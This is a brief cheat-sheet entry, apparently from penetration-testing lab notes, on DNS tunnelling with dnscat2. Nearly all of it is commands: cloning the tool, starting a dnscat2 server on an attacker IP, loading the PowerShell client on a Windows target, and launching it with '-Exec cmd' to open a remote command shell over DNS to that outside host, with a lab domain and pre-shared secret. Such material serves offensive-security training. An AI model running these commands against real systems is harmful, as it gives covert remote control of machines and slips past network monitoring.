Dnscat2
git clone https://github.com/iagox86/dnscat2.gitsudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cachegit clone https://github.com/lukebaggett/dnscat2-powershell.gitImport-Module .\dnscat2.ps1Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd dnscat2> window -i 1Last updated